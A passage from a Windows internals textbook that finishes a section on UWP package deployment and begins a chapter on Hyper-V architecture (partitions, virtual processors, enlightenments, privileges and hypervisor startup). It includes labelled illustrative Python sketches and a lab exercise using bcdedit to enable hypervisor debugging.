C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps>fsreparser read MicrosoftEdge.exe
File System Reparse Point / Extended Attributes Parser 0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Reading UWP attributes...
Source file: MicrosoftEdge.exe.
The source file does not contain any Extended Attributes.
The file contains a valid UWP Reparse point (version 3).
Package family name: Microsoft.MicrosoftEdge_8wekyb3d8bbwe
Application User Model Id: Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
UWP App Target full path: C:\Windows\System32\SystemUWPLauncher.exe
Alias Type: UWP Single Instance
As you can see from the output of the tool, the CreateProcess API can extract all the informa-
tion that it needs to properly execute a modern application’s activation. This explains why you
can launch Edge from the command line.
Package registration
When a user wants to install a modern application, usually she opens the AppStore, looks for the ap-
plication, and clicks the Get button. This action starts the download of an archive that contains a bunch
of files: the package manifest file, the application digital signature, and the block map, which represents
the chain of trust of the certificates included in the digital signature. The archive is initially stored in the
C:\Windows\SoftwareDistribution\Download folder. The AppStore process (WinStore.App.exe) com-
municates with the Windows Update service (wuaueng.dll), which manages the download requests.
The downloaded files are manifests that contain the list of all the modern application’s files, the
application dependencies, the license data, and the steps needed to correctly register the package.
The Windows Update service recognizes that the download request is for a modern application, veri-
fies the calling process token (which should be an AppContainer), and, using services provided by the
AppXDeploymentClient.dll library, verifies that the package is not already installed in the system. It
then creates an AppX Deployment request and, through RPC, sends it to the AppX Deployment Server.
The latter runs as a PPL service in a shared service host process (which also hosts the Client License
Service, running at the same protection level). The Deployment Request is placed into a queue, which
is managed asynchronously. When the AppX Deployment Server sees the request, it dequeues it and
spawns a thread that starts the actual modern application deployment process.
Note Starting with Windows 8.1, the UWP deployment stack supports the concept of
bundles. Bundles are packages that contain multiple resources, like different languages
or features that have been designed only for certain regions. The deployment stack
implements an applicability logic that can download only the needed part of the
compressed bundle after checking the user profile and system settings.
A modern application deployment process involves a complex sequence of events. We summarize
here the entire deployment process in three main phases.
Phase 1: Package staging
After Windows Update has downloaded the application manifest, the AppX Deployment Server verifies
that all the package dependencies are satisfied, checks the application prerequisites, like the target
supported device family (Phone, Desktop, Xbox, and so on), and checks whether the file system of
the target volume is supported. All the prerequisites that the application needs are expressed in the
manifest file with each dependency. If all the checks pass, the staging procedure creates the pack-
age root directory (usually in C:\Program Files\WindowsApps\<PackageFullName>) and its subfold-
ers. Furthermore, it protects the package folders, applying proper ACLs on all of them. If the modern
application is a Centennial type, it loads the daxexec.dll library and creates VFS reparse points needed
by the Windows Container Isolation minifilter driver (see the “Centennial applications” section earlier
in this chapter) with the goal of virtualizing the application data folder properly. It finally saves the
package root path into the HKLM\SOFTWARE\Classes\LocalSettings\Software\Microsoft\Windows\
CurrentVersion\AppModel\PackageRepository\Packages\<PackageFullName> registry key, in the Path
registry value.
The staging procedure then preallocates the application’s files on disk, calculates the final down-
load size, and extracts the server URL that contains all the package files (compressed in an AppX file). It
then downloads the final AppX from the remote servers, again using the Windows Update service.
Phase 2: User data staging
This phase is executed only if the user is updating the application. This phase simply restores the user
data of the previous package and stores them in the new application path.
Phase 3: Package registration
The most important phase of the deployment is the package registration. This complex phase uses
services provided by the AppXDeploymentExtensions.onecore.dll library (and AppXDeploymentExtensions
.desktop.dll for desktop-specific deployment parts). We refer to it as Package Core Installation. At this
stage, the AppX Deployment Server mainly needs to update the State Repository. It creates new entries
for the package, for the one or more applications that compose the package, the new tiles, package
capabilities, the application license, and so on. To do this, the AppX Deployment Server uses database
transactions, which it commits only if no previous errors occurred (otherwise, they are discarded).
When all the database transactions that compose a State Repository deployment operation are com-
mitted, the State Repository can call the registered listeners, with the goal of notifying each client that
has requested a notification. (See the “State Repository” section in this chapter for more information
about the change and event tracking feature of the State Repository.)
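The commit-then-notify behavior can be captured in a toy model. The class below is not the State Repository's API (which is an internal SQLite-backed store); it only demonstrates that staged rows become visible, and listeners fire, strictly after a successful all-or-nothing commit:

```python
class StateRepository:
    def __init__(self):
        self.tables = {}
        self.listeners = []

    def deploy(self, entries):
        staged = {}
        for table, row in entries:           # build the transaction
            if row is None:                  # any error discards everything
                return False
            staged.setdefault(table, []).append(row)
        for table, rows in staged.items():   # all-or-nothing commit
            self.tables.setdefault(table, []).extend(rows)
        for notify in self.listeners:        # notify only after the commit
            notify(sorted(staged))
        return True
```

A failed deployment leaves the store untouched and never reaches the listeners, mirroring the discard behavior described above.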
The last steps for the package registration include creating the Dependency Mini Repository file and
updating the machine registry to reflect the new data stored in the State Repository. This terminates
the deployment process. The new application is now ready to be activated and run.
Note For readability reasons, the deployment process has been significantly simplified.
For example, in the described staging phase, we have omitted some initial subphases, like
the Indexing phase, which parses the AppX manifest file; the Dependency Manager phase,
used to create a work plan and analyze the package dependencies; and the Package In Use
phase, which has the goal of communicating with PLM to verify that the package is not
already installed and in use.
Furthermore, if an operation fails, the deployment stack must be able to revert all the
changes. The other revert phases have not been described in the previous section.
Conclusion
In this chapter, we have examined the key base system mechanisms on which the Windows executive
is built. In the next chapter, we introduce the virtualization technologies that Windows supports with
the goal of improving the overall system security, providing a fast execution environment for virtual
machines, isolated containers, and secure enclaves.
C H A P T E R 9
Virtualization technologies
One of the most important technologies used for running multiple operating systems on the same
physical machine is virtualization. At the time of this writing, there are multiple types of virtualiza-
tion technologies available from different hardware manufacturers, which have evolved over the years.
Virtualization technologies are not only used for running multiple operating systems on a physical
machine, but they have also become the basics for important security features like the Virtual Secure
Mode (VSM) and Hypervisor-Enforced Code Integrity (HVCI), which can’t be run without a hypervisor.
In this chapter, we give an overview of the Windows virtualization solution, called Hyper-V. Hyper-V
is composed of the hypervisor, which is the component that manages the platform-dependent virtu-
alization hardware, and the virtualization stack. We describe the internal architecture of Hyper-V and
provide a brief description of its components (memory manager, virtual processors, intercepts, sched-
uler, and so on). The virtualization stack is built on the top of the hypervisor and provides different ser-
vices to the root and guest partitions. We describe all the components of the virtualization stack (VM
Worker process, virtual machine management service, VID driver, VMBus, and so on) and the different
hardware emulation that is supported.
In the last part of the chapter, we describe some technologies based on the virtualization, such as
VSM and HVCI. We present all the secure services that those technologies provide to the system.
The Windows hypervisor
The Hyper-V hypervisor (also known as Windows hypervisor) is a type-1 (native or bare-metal) hyper-
visor: a mini operating system that runs directly on the host’s hardware to manage a single root and
one or more guest operating systems. Unlike type-2 (or hosted) hypervisors, which run on top of a
conventional OS like normal applications, the Windows hypervisor abstracts the root OS, which knows
about the existence of the hypervisor and communicates with it to allow the execution of one or more
guest virtual machines. Because the hypervisor is part of the operating system, managing the guests
inside it, as well as interacting with them, is fully integrated in the operating system through standard
management mechanisms such as WMI and services. In this case, the root OS contains some enlighten-
ments. Enlightenments are special optimizations in the kernel and possibly device drivers that detect
that the code is being run virtualized under a hypervisor, so they perform certain tasks differently, or
more efficiently, considering this environment.
Figure 9-1 shows the basic architecture of the Windows virtualization stack, which is described in
detail later in this chapter.
FIGURE 9-1 The Hyper-V architectural stack (hypervisor and virtualization stack). (The diagram shows the root partition with VMWPs, VMMS, WMI, VSPs, the VID driver, and WinHv; enlightened Windows and Linux child partitions with VSCs/ICs and VMBus; an unenlightened child partition; and the hypervisor layer with its partition manager, scheduler, address management, hypercalls, MSRs, and APIC support.)
At the bottom of the architecture is the hypervisor, which is launched very early during the system
boot and provides its services for the virtualization stack to use (through the use of the hypercall inter-
face). The early initialization of the hypervisor is described in Chapter 12, “Startup and shutdown.” The
hypervisor startup is initiated by the Windows Loader, which determines whether to start the hypervisor
and the Secure Kernel; if the hypervisor and Secure Kernel are started, the Windows Loader uses the services
of the Hvloader.dll to detect the correct hardware platform and load and start the proper version of
the hypervisor. Because Intel and AMD (and ARM64) processors have differing implementations of
hardware-assisted virtualization, there are different hypervisors. The correct one is selected at boot-up
time after the processor has been queried through CPUID instructions. On Intel systems, the Hvix64.exe
binary is loaded; on AMD systems, the Hvax64.exe image is used. As of the Windows 10 May 2019
Update (19H1), the ARM64 version of Windows supports its own hypervisor, which is implemented in
the Hvaa64.exe image.
At a high level, the hardware virtualization extension used by the hypervisor is a thin layer that
resides between the OS kernel and the processor. This layer, which intercepts and emulates in a safe
manner sensitive operations executed by the OS, is run in a higher privilege level than the OS kernel.
(Intel calls this mode VMXROOT. Most books and literature define the VMXROOT security domain as
“Ring -1.”) When an operation executed by the underlying OS is intercepted, the processor stops running
the OS code and transfers execution to the hypervisor at the higher privilege level. This operation is
commonly referred to as a VMEXIT event. In the same way, when the hypervisor has finished process-
ing the intercepted operation, it needs a way to allow the physical CPU to restart the execution of the
OS code. New opcodes have been defined by the hardware virtualization extension, which allow a
VMENTER event to happen; the CPU restarts the execution of the OS code at its original privilege level.
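The VMEXIT/VMENTER cycle can be illustrated with a toy dispatch loop. This is a conceptual model only (the set of intercepted operations and the handler mechanism are stand-ins, not the VT-x/SVM interfaces):

```python
# Operations a hypervisor typically intercepts; the real set is configured
# per partition and per hardware platform.
SENSITIVE = {"cpuid", "wrmsr", "in", "out"}

def run_guest(instructions, emulate):
    trace = []
    for insn in instructions:
        if insn in SENSITIVE:
            trace.append(("VMEXIT", insn))   # CPU leaves the guest context
            emulate(insn)                    # handled safely at the higher
                                             # privilege level (VMXROOT)
            trace.append(("VMENTER", insn))  # resume at original privilege
        else:
            trace.append(("guest", insn))    # runs directly on the CPU
    return trace
```

Everything that is not sensitive executes at native speed; only the intercepted operations pay the round-trip cost into the hypervisor.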
Partitions, processes, and threads
One of the key architectural components behind the Windows hypervisor is the concept of a partition.
A partition essentially represents the main isolation unit, an instance of an operating system instal-
lation, which can refer either to what’s traditionally called the host or the guest. Under the Windows
hypervisor model, these two terms are not used; instead, we talk of either a root partition or a child
partition, respectively. A partition is composed of some physical memory and one or more virtual
processors (VPs) with their local virtual APICs and timers. (In the global term, a partition also includes
a virtual motherboard and multiple virtual peripherals. These are virtualization stack concepts, which
do not belong to the hypervisor.)
At a minimum, a Hyper-V system has a root partition—in which the main operating system control-
ling the machine runs—the virtualization stack, and its associated components. Each operating system
running within the virtualized environment represents a child partition, which might contain certain
additional tools that optimize access to the hardware or allow management of the operating system.
Partitions are organized in a hierarchical way. The root partition has control of each child and receives
some notifications (intercepts) for certain kinds of events that happen in the child. The majority of the
physical hardware accesses that happen in the root are passed through by the hypervisor; this means
that the parent partition is able to talk directly to the hardware (with some exceptions). In contrast,
child partitions are usually not able to communicate directly with the physical machine’s hardware
(again with some exceptions, which are described later in this chapter in the section “The virtualization
stack”). Each I/O is intercepted by the hypervisor and redirected to the root if needed.
One of the main goals behind the design of the Windows hypervisor was to have it be as small and
modular as possible, much like a microkernel—no need to support any hypervisor driver or provide a
full, monolithic module. This means that most of the virtualization work is actually done by a separate
virtualization stack (refer to Figure 9-1). The hypervisor uses the existing Windows driver architecture
and talks to actual Windows device drivers. This architecture results in several components that provide
and manage this behavior, which are collectively called the virtualization stack. Although the hypervi-
sor is read from the boot disk and executed by the Windows Loader before the root OS (and the parent
partition) even exists, it is the parent partition that is responsible for providing the entire virtualization
stack. Because these are Microsoft components, only a Windows machine can be a root partition. The
Windows OS in the root partition is responsible for providing the device drivers for the hardware on the
system, as well as for running the virtualization stack. It’s also the management point for all the child
partitions. The main components that the root partition provides are shown in Figure 9-2.
FIGURE 9-2 Components of the root partition. (The diagram shows the virtualization stack in the root partition: the WMI provider, the VMM service, and the VM worker processes in user mode, and the virtualization service providers (VSPs), device drivers, and the Windows kernel in kernel mode.)
Child partitions
A child partition is an instance of any operating system running parallel to the parent partition.
(Because you can save or pause the state of any child, it might not necessarily be running.) Unlike the
parent partition, which has full access to the APIC, I/O ports, and its physical memory (but not access
to the hypervisor’s and Secure Kernel’s physical memory), child partitions are limited for security and
management reasons to their own view of address space (the Guest Physical Address, or GPA, space,
which is managed by the hypervisor) and have no direct access to hardware (even though they may
have direct access to certain kinds of devices; see the “Virtualization stack” section for further details).
In terms of hypervisor access, a child partition is also limited mainly to notifications and state changes.
For example, a child partition doesn’t have control over other partitions (and can’t create new ones).
Child partitions have many fewer virtualization components than a parent partition because they
aren’t responsible for running the virtualization stack—only for communicating with it. These
components can also be considered optional because they enhance performance of the environment but
aren’t critical to its use. Figure 9-3 shows the components present in a typical Windows child partition.
FIGURE 9-3 Components of a child partition (user mode: guest applications; kernel mode: the virtualization service clients (VSCs), enlightenments, and the Windows kernel).
Processes and threads
The Windows hypervisor represents a virtual machine with a partition data structure. A partition,
as described in the previous section, is composed of some memory (guest physical memory) and one
or more virtual processors (VP). Internally in the hypervisor, each virtual processor is a schedulable
entity, and the hypervisor, like the standard NT kernel, includes a scheduler. The scheduler dispatches
the execution of virtual processors, which belong to different partitions, to each physical CPU. (We
discuss the multiple types of hypervisor schedulers later in this chapter in the “Hyper-V schedulers”
section.) A hypervisor thread (TH_THREAD data structure) is the glue between a virtual processor and
its schedulable unit. Figure 9-4 shows the data structure, which represents the current physical execu-
tion context. It contains the thread execution stack, scheduling data, a pointer to the thread’s virtual
processor, the entry point of the thread dispatch loop (discussed later) and, most important, a pointer
to the hypervisor process that the thread belongs to.
FIGURE 9-4 The hypervisor's thread data structure (scheduling information, physical processor local storage (PLS), the VP stack, the owning process, and the dispatch loop entry point).
The hypervisor builds a thread for each virtual processor it creates and associates the newborn
thread with the virtual processor data structure (VM_VP).
A hypervisor process (TH_PROCESS data structure), shown in Figure 9-5, represents a partition
and is a container for its physical (and virtual) address space. It includes the list of the threads (which
are backed by virtual processors), scheduling data (the physical CPUs affinity in which the process is
allowed to run), and a pointer to the partition basic memory data structures (memory compartment,
reserved pages, page directory root, and so on). A process is usually created when the hypervisor
builds the partition (VM_PARTITION data structure), which will represent the new virtual machine.
FIGURE 9-5 The hypervisor's process data structure (scheduling information, the thread list, and the partition's memory compartment).
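The relationship between these structures can be modeled in a few lines of Python. This is an illustrative sketch only, not actual hypervisor code; the class and field names are simplified stand-ins for the TH_THREAD and TH_PROCESS structures described above.

```python
# Illustrative model: how TH_PROCESS and TH_THREAD relate partitions,
# virtual processors, and schedulable threads. Names are invented stand-ins.
from dataclasses import dataclass, field
from typing import List

@dataclass
class HvThread:                       # stands in for TH_THREAD
    vp_index: int                     # the virtual processor this thread backs
    owning_process: "HvProcess" = None

@dataclass
class HvProcess:                      # stands in for TH_PROCESS
    partition_id: int                 # the partition (VM_PARTITION) this process backs
    threads: List[HvThread] = field(default_factory=list)

    def create_vp_thread(self, vp_index: int) -> HvThread:
        # The hypervisor builds one thread for each virtual processor it creates.
        t = HvThread(vp_index=vp_index, owning_process=self)
        self.threads.append(t)
        return t

# A partition with two VPs ends up with one process owning two backing threads.
proc = HvProcess(partition_id=1)
t0 = proc.create_vp_thread(0)
t1 = proc.create_vp_thread(1)
```

The key invariant the sketch captures is that every schedulable unit (thread) points back to its owning process, which in turn represents exactly one partition.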
Enlightenments
Enlightenments are one of the key performance optimizations that Windows virtualization takes ad-
vantage of. They are direct modifications to the standard Windows kernel code that can detect that the
operating system is running in a child partition and perform work differently. Usually, these optimiza-
tions are highly hardware-specific and result in a hypercall to notify the hypervisor.
An example is notifying the hypervisor of a long busy-wait spin loop. The hypervisor can keep some
state on the spin wait and decide to schedule another VP on the same physical processor until the wait
can be satisfied. Entering and exiting an interrupt state and access to the APIC can be coordinated with
the hypervisor, which can be enlightened to avoid trapping the real access and then virtualizing it.
Another example has to do with memory management, specifically translation lookaside buffer
(TLB) flushing. (See Part 1, Chapter 5, “Memory management,” for more information on these con-
cepts.) Usually, the operating system executes a CPU instruction to flush one or more stale TLB entries,
which affects only a single processor. In multiprocessor systems, usually a TLB entry must be flushed
from every active processor’s cache (the system sends an inter-processor interrupt to every active
processor to achieve this goal). However, because a child partition could be sharing physical CPUs with
many other child partitions, and some of them could be executing a different VM’s virtual processor
at the time the TLB flush is initiated, such an operation would also flush this information for those VMs.
Furthermore, a virtual processor would be rescheduled to execute only the TLB flushing IPI, resulting
in noticeable performance degradation. If Windows is running under a hypervisor, it instead issues a
hypercall to have the hypervisor flush only the specific information belonging to the child partition.
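The TLB-flush enlightenment above can be sketched as a simple decision: broadcast IPIs on bare metal, or issue a single hypercall when enlightened. This is a hedged illustration with invented function names, not the real kernel logic.

```python
# Illustrative sketch of the TLB-flush enlightenment. On bare metal, a flush
# is broadcast to every other active processor via IPIs; under a hypervisor,
# an enlightened kernel issues one hypercall so only the child partition's
# entries are flushed. All names here are invented for the sketch.

def flush_tlb(entries, running_under_hypervisor, active_cpus):
    """Return a summary of the work performed, for illustration."""
    if running_under_hypervisor:
        # One hypercall; the hypervisor flushes only this partition's entries.
        return {"hypercalls": 1, "ipis": 0}
    # Bare metal: an inter-processor interrupt per other active processor.
    return {"hypercalls": 0, "ipis": max(active_cpus - 1, 0)}

bare_metal = flush_tlb(["va1"], running_under_hypervisor=False, active_cpus=8)
enlightened = flush_tlb(["va1"], running_under_hypervisor=True, active_cpus=8)
```

The sketch makes the performance trade-off explicit: seven IPIs (and seven VP reschedules, in the worst case) versus a single hypercall.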
Partition’s privileges, properties, and version features
When a partition is initially created (usually by the VID driver), no virtual processors (VPs) are associated
with it. At that time, the VID driver is free to add or remove some of the partition's privileges. Indeed, when
the partition is first created, the hypervisor assigns some default privileges to it, depending on its type.
A partition’s privilege describes which action—usually expressed through hypercalls or synthetic
MSRs (model specific registers)—the enlightened OS running inside a partition is allowed to perform
on behalf of the partition itself. For example, the Access Root Scheduler privilege allows a child parti-
tion to notify the root partition that an event has been signaled and a guest’s VP can be rescheduled
(this usually increases the priority of the guest’s VP-backed thread). The Access VSM privilege instead
allows the partition to enable VTL 1 and access its properties and configuration (usually exposed
through synthetic registers). Table 9-1 lists all the privileges assigned by default by the hypervisor.
Partition privileges can only be set before the partition creates and starts any VPs; the hypervisor
won’t allow requests to set privileges after a single VP in the partition starts to execute. Partition prop-
erties are similar to privileges but do not have this limitation; they can be set and queried at any time.
There are different groups of properties that can be queried or set for a partition. Table 9-2 lists the
properties groups.
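The privilege-locking rule can be modeled as follows. This is an illustrative sketch with invented names; the real enforcement happens inside the hypervisor when it validates hypercalls.

```python
# Illustrative model of the rule described above: partition privileges can be
# changed only before any VP starts executing, while properties can be set
# and queried at any time. Class and privilege names are invented.

class Partition:
    def __init__(self, default_privileges):
        self.privileges = set(default_privileges)
        self.properties = {}
        self.vp_started = False

    def set_privilege(self, priv):
        if self.vp_started:
            raise PermissionError("privileges are locked once a VP runs")
        self.privileges.add(priv)

    def set_property(self, group, value):
        self.properties[group] = value      # allowed at any time

    def start_vp(self):
        self.vp_started = True

child = Partition({"AccessRootScheduler"})
child.set_privilege("AccessVsm")            # OK: no VP has started yet
child.start_vp()
child.set_property("Scheduling", {"Cap": 50})   # properties remain settable
try:
    child.set_privilege("CreatePartitions")
    locked = False
except PermissionError:
    locked = True
```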
When a partition is created, the VID infrastructure provides a compatibility level (which is specified
in the virtual machine’s configuration file) to the hypervisor. Based on that compatibility level, the hy-
pervisor enables or disables specific virtual hardware features that could be exposed by a VP to the un-
derlying OS. There are multiple features that tune how the VP behaves based on the VM’s compatibility
level. A good example would be the hardware Page Attribute Table (PAT), which is a configurable caching type for virtual memory. Prior to Windows 10 Anniversary Update (RS1), guest VMs weren't able to use PAT, so if the compatibility level of a VM specifies a release before Windows 10 RS1, the hypervisor will not expose the PAT registers to the underlying guest OS. Otherwise, if the compatibility level is Windows 10 RS1 or higher, the hypervisor exposes the PAT support to the underlying OS running in the guest VM. When the root partition is initially created at boot time, the
hypervisor enables the highest compatibility level for it. In that way the root OS can use all the features
supported by the physical hardware.
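The compatibility-level gating can be sketched as an ordered comparison, using PAT as the example from the text. The level names and their ordering below are assumptions for illustration only.

```python
# Hedged sketch of feature gating by compatibility level. The level names in
# COMPAT_ORDER are hypothetical; only the PAT/RS1 relationship comes from the
# text above.

COMPAT_ORDER = ["WindowsThreshold", "Windows10RS1", "Windows10RS5"]

def exposed_features(compat_level):
    features = {"base_cpuid"}
    # PAT registers are exposed only from Windows 10 RS1 onward.
    if COMPAT_ORDER.index(compat_level) >= COMPAT_ORDER.index("Windows10RS1"):
        features.add("PAT")
    return features

old_vm = exposed_features("WindowsThreshold")   # pre-RS1 compatibility level
new_vm = exposed_features("Windows10RS5")       # RS1 or later
```

The root partition, created with the highest compatibility level, would correspondingly see every feature the physical hardware supports.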
TABLE 9-1 Partition's privileges

Root and child partition:
■ Read/write a VP's runtime counter
■ Read the current partition reference time
■ Access SynIC timers and registers
■ Query/set the VP's virtual APIC assist page
■ Read/write hypercall MSRs
■ Request VP IDLE entry
■ Read VP's index
■ Map or unmap the hypercall's code area
■ Read a VP's emulated TSC (time-stamp counter) and its frequency
■ Control the partition TSC and re-enlightenment emulation
■ Read/write VSM synthetic registers
■ Read/write VP's per-VTL registers
■ Start an AP virtual processor
■ Enable partition's fast hypercall support

Root partition only:
■ Create child partition
■ Look up and reference a partition by ID
■ Deposit/withdraw memory from the partition compartment
■ Post messages to a connection port
■ Signal an event in a connection port's partition
■ Create/delete and get properties of a partition's connection port
■ Connect/disconnect to a partition's connection port
■ Map/unmap the hypervisor statistics page (which describes a VP, LP, partition, or hypervisor)
■ Enable the hypervisor debugger for the partition
■ Schedule child partition's VPs and access SynIC synthetic MSRs
■ Trigger an enlightened system reset
■ Read the hypervisor debugger options for a partition

Child partition only:
■ Generate an extended hypercall intercept in the root partition
■ Notify a root scheduler's VP-backed thread of an event being signaled

EXO partition:
■ None
TABLE 9-2 Partition's properties

Scheduling properties: Set/query properties related to the classic and core scheduler, like Cap, Weight, and Reserve.
Time properties: Allow the partition to be suspended/resumed.
Debugging properties: Change the hypervisor debugger runtime configuration.
Resource properties: Query virtual hardware platform-specific properties of the partition (like TLB size, SGX support, and so on).
Compatibility properties: Query virtual hardware platform-specific properties that are tied to the initial compatibility features.
The hypervisor startup
In Chapter 12, we analyze how a UEFI-based workstation boots up and all the components engaged in loading and starting the correct version of the hypervisor binary. In this section, we
briefly discuss what happens in the machine after the HvLoader module has transferred the execution
to the hypervisor, which takes control for the first time.
The HvLoader loads the correct version of the hypervisor binary image (depending on the CPU
manufacturer) and creates the hypervisor loader block. It captures a minimal processor context, which
the hypervisor needs to start the first virtual processor. The HvLoader then switches to a new, just-
created, address space and transfers the execution to the hypervisor image by calling the hypervisor
image entry point, KiSystemStartup, which prepares the processor for running the hypervisor and ini-
tializes the CPU_PLS data structure. The CPU_PLS represents a physical processor and acts as the PRCB
data structure of the NT kernel; the hypervisor is able to quickly address it (using the GS segment).
Unlike in the NT kernel, KiSystemStartup is called only for the boot processor (the application processors' startup sequence is covered in the "Application Processors (APs) Startup" section later in this chapter); thus, it defers the real initialization to another function, BmpInitBootProcessor.
BmpInitBootProcessor starts a complex initialization sequence. The function examines the system
and queries all the CPU’s supported virtualization features (such as the EPT and VPID; the queried
features are platform-specific and vary between the Intel, AMD, or ARM version of the hypervisor). It
then determines the hypervisor scheduler, which will manage how the hypervisor will schedule virtual
processors. For Intel and AMD server systems, the default scheduler is the core scheduler, whereas the
root scheduler is the default for all client systems (including ARM64). The scheduler type can be manu-
ally overridden through the hypervisorschedulertype BCD option (more information about the different
hypervisor schedulers is available later in this chapter).
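The default-scheduler selection can be sketched as a small decision function. The function name and inputs below are invented for illustration; only the defaults (core scheduler for Intel/AMD servers, root scheduler for clients including ARM64, overridable via the hypervisorschedulertype BCD option) come from the text.

```python
# Illustrative sketch of the scheduler-selection logic described above.

def pick_scheduler(is_server, arch, bcd_override=None):
    if bcd_override is not None:
        return bcd_override              # manual override via the BCD option
    if is_server and arch in ("intel", "amd"):
        return "core"
    return "root"                        # all client systems, including ARM64

cases = [
    pick_scheduler(is_server=True, arch="intel"),
    pick_scheduler(is_server=False, arch="amd"),
    pick_scheduler(is_server=False, arch="arm64"),
    pick_scheduler(is_server=True, arch="intel", bcd_override="classic"),
]
```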
The nested enlightenments are initialized. Nested enlightenments allow the hypervisor to be executed in nested configurations, where a root hypervisor (called the L0 hypervisor) manages the real hardware and another hypervisor (called the L1 hypervisor) is executed in a virtual machine. After this stage, the BmpInitBootProcessor routine performs the initialization of the following components:
■ Memory manager (initializes the PFN database and the root compartment).

■ The hypervisor's hardware abstraction layer (HAL).

■ The hypervisor's process and thread subsystem (which depends on the chosen scheduler type). The system process and its initial thread are created. This process is special; it isn't tied to any partition and hosts threads that execute the hypervisor code.

■ The VMX virtualization abstraction layer (VAL). The VAL's purpose is to abstract differences between all the supported hardware virtualization extensions (Intel, AMD, and ARM64). It includes code that operates on platform-specific features of the machine's virtualization technology in use by the hypervisor (for example, on the Intel platform the VAL layer manages the "unrestricted guest" support, the EPT, SGX, MBEC, and so on).

■ The Synthetic Interrupt Controller (SynIC) and I/O Memory Management Unit (IOMMU).
■ The Address Manager (AM), which is the component responsible for managing the physical memory assigned to a partition (called guest physical memory, or GPA) and its translation to real physical memory (called system physical memory). Although the first implementation of Hyper-V supported shadow page tables (a software technique for address translation), since Windows 8.1, the Address Manager uses platform-dependent code for configuring the hypervisor address translation mechanism offered by the hardware (extended page tables for Intel, nested page tables for AMD). In hypervisor terms, the physical address space of a partition is called an address domain. The platform-independent physical address space translation is commonly called Second Level Address Translation (SLAT). The term refers to Intel's EPT, AMD's NPT, or the ARM 2-stage address translation mechanism.
The hypervisor can now finish constructing the CPU_PLS data structure associated with the boot
processor by allocating the initial hardware-dependent virtual machine control structures (VMCS for
Intel, VMCB for AMD) and by enabling virtualization through the first VMXON operation. Finally, the
per-processor interrupt mapping data structures are initialized.
EXPERIMENT: Connecting the hypervisor debugger
In this experiment, you will connect the hypervisor debugger for analyzing the startup sequence
of the hypervisor, as discussed in the previous section. The hypervisor debugger is supported
only via serial or network transports. Only physical machines can be used to debug the hypervi-
sor, or virtual machines in which the “nested virtualization” feature is enabled (see the “Nested
virtualization” section later in this chapter). In the latter case, only serial debugging can be en-
abled for the L1 virtualized hypervisor.
For this experiment, you need a separate physical machine that supports virtualization exten-
sions and has the Hyper-V role installed and enabled. You will use this machine as the debugged
system, attached to your host system (which acts as the debugger) where you are running the
debugging tools. As an alternative, you can set up a nested VM, as shown in the “Enabling nested
virtualization on Hyper-V” experiment later in this chapter (in that case you don’t need another
physical machine).
As a first step, you need to download and install the “Debugging Tools for Windows” in the
host system, which are available as part of the Windows SDK (or WDK), downloadable from
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk. As an alternative,
for this experiment you can also use WinDbgX, which, at the time of this writing, is available in the Windows Store by searching for "WinDbg Preview."

The debugged system for this experiment must have Secure Boot disabled; hypervisor debugging is not compatible with Secure Boot. Refer to your workstation's user manual to understand how to disable Secure Boot (usually the Secure Boot settings are located in the UEFI BIOS). To enable the hypervisor debugger in the debugged system, you should first open an administrative command prompt (by typing cmd in the Cortana search box and selecting Run as administrator).
In case you want to debug the hypervisor through your network card, you should type the following commands, replacing <HostIp> with the IP address of the host system; <HostPort> with a valid port in the host (from 49152); and <NetCardBusParams> with the bus parameters of the network card of the debugged system, specified in the XX.YY.ZZ format (where XX is the bus number, YY is the device number, and ZZ is the function number). You can discover the bus parameters of your network card through the Device Manager applet or through the KDNET.exe tool available in the Windows SDK:
bcdedit /hypervisorsettings net hostip:<HostIp> port:<HostPort>
bcdedit /set {hypervisorsettings} hypervisordebugpages 1000
bcdedit /set {hypervisorsettings} hypervisorbusparams <NetCardBusParams>
bcdedit /set hypervisordebug on
The following figure shows a sample system in which the network interface used for debugging the hypervisor has the bus parameters 0.25.0, and the debugger is targeting a host system configured with the IP address 192.168.0.56 on port 58010.
Take note of the returned debugging key. After you reboot the debugged system, you should
run Windbg in the host, with the following command:
windbg.exe -d -k net:port=<HostPort>,key=<DebuggingKey>
You should be able to debug the hypervisor, and follow its startup sequence, even though
Microsoft may not release the symbols for the main hypervisor module:
In a VM with nested virtualization enabled, you can enable the L1 hypervisor debugger only
through the serial port by using the following command in the debugged system:
bcdedit /hypervisorsettings SERIAL DEBUGPORT:1 BAUDRATE:115200
The creation of the root partition and the boot virtual processor
The first steps that a fully initialized hypervisor needs to execute are the creation of the root partition
and the first virtual processor used for starting the system (called BSP VP). Creating the root partition
follows almost the same rules as for child partitions; multiple layers of the partition are initialized one
after the other. In particular:
1. The VM-layer initializes the maximum allowed number of VTL levels and sets up the partition privileges based on the partition's type (see the previous section for more details). Furthermore, the VM layer determines the partition's allowable features based on the specified partition's compatibility level. The root partition supports the maximum allowable features.

2. The VP layer initializes the virtualized CPUID data, which all the virtual processors of the partition use when a CPUID is requested from the guest operating system. The VP layer creates the hypervisor process, which backs the partition.

3. The Address Manager (AM) constructs the partition's initial physical address space by using machine platform-dependent code (which builds the EPT for Intel, NPT for AMD). The constructed physical address space depends on the partition type. The root partition uses identity mapping, which means that all the guest physical memory corresponds to the system physical memory (more information is provided later in this chapter in the "Partitions' physical address space" section).
Finally, after the SynIC, IOMMU, and the intercepts’ shared pages are correctly configured for the
partition, the hypervisor creates and starts the BSP virtual processor for the root partition, which is the only one used to restart the boot process.
A hypervisor virtual processor (VP) is represented by a big data structure (VM_VP), shown in
Figure 9-6. A VM_VP data structure maintains all the data used to track the state of the virtual proces-
sor: its platform-dependent registers state (like general purposes, debug, XSAVE area, and stack) and
data, the VP’s private address space, and an array of VM_VPLC data structures, which are used to track
the state of each Virtual Trust Level (VTL) of the virtual processor. The VM_VP also includes a pointer to
the VP’s backing thread and a pointer to the physical processor that is currently executing the VP.
FIGURE 9-6 The VM_VP data structure representing a virtual processor (the virtual registers state, backing thread, intercept packet, pointer to the physical CPU_PLS, the VM_VPLC array for VTL 0 and VTL 1, the VP's private address space and zone, and SynIC data).
As for the partitions, creating the BSP virtual processor is similar to the process of creating normal
virtual processors. VmAllocateVp is the function responsible for allocating and initializing the needed
memory from the partition’s compartment, used for storing the VM_VP data structure, its platform-
dependent part, and the VM_VPLC array (one for each supported VTL). The hypervisor copies the initial
